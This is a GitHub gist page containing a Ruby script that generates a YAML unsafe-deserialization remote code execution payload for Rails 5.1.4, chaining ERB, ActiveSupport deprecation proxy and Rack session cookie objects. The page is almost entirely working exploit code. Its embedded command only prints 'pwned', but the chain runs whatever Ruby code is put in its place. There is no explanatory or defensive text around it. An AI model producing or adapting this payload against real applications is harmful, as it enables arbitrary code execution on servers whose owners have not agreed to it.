Skip to content

Instantly share code, notes, and snippets.

@mpgn

mpgn/railspwn.rb

Forked from niklasb/railspwn.rb
Created March 18, 2019 21:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mpgn/906b0ba260f7ff368fa8fcd66e5b53fa to your computer and use it in GitHub Desktop.
Save mpgn/906b0ba260f7ff368fa8fcd66e5b53fa to your computer and use it in GitHub Desktop.
Download ZIP
Rails 5.1.4 YAML unsafe deserialization RCE payload
Raw
railspwn.rb
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
def initialize(instance, method)
@instance = instance
@method = method
@deprecator = ActiveSupport::Deprecation.new
end
end
end
end
code = <<-EOS
puts "pwned"
EOS
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@lineno, 1337
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "")
payload = <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
!ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash
id: 'hi from espr'
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
loaded: false
PAYLOAD
puts payload
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment